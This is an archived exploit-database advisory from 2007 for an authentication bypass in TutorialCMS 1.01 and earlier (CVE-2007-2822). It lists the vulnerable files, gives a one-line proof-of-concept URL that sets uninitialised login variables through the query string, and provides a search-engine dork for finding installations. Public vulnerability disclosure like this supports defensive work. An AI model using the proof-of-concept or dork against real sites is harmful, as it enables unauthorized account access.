TutorialCMS <= 1.01 - Authentication Bypass Vulnerability

2007-05-21T00:00:00
ID EDB-ID:3963
Type exploitdb
Reporter Silentz
Modified 2007-05-21T00:00:00

Description

TutorialCMS <= 1.01 Authentication Bypass Vulnerability. CVE-2007-2822. Webapps exploit for php platform

                                        
                                            #################################################################################
#										#
#		     TutorialCMS &lt;= 1.01 Authentication Bypass			#
#										#
# Discovered by: Silentz							#
# Payload: Authentication Bypass						#
# Website: http://www.w4ck1ng.com						#
# 										#
# Vulnerability:								#
#										#
#	Variables $loggedIn & $activated are not predefined.			#
#										#
# Vulnerable Files:								#
#      										#
#	login.php								#
#	headerLinks.php								#
#	submit1.php								#
#	myFav.php								#
#	userCP.php								#
#										#
#										#
# PoC: http://victim.com/tutorialcms/userCP.php?loggedIn=1&activated=1		#
# 										#
# Subject To: register_globals set to on					#
# GoogleDork: "Powered By Photoshop Tutorials" 					#
#										#
# Shoutz: The entire w4ck1ng community						#
#										#
# Notes to developers:								#
#										#
#	You should allways fully disclose the vulnerabilities before someone	#
#       else does, just looks better. Also, try changing the "Date Modified" 	#
#	stamp on the files before you wrap it up for upload ;)			#
#										#
#################################################################################

# milw0rm.com [2007-05-21]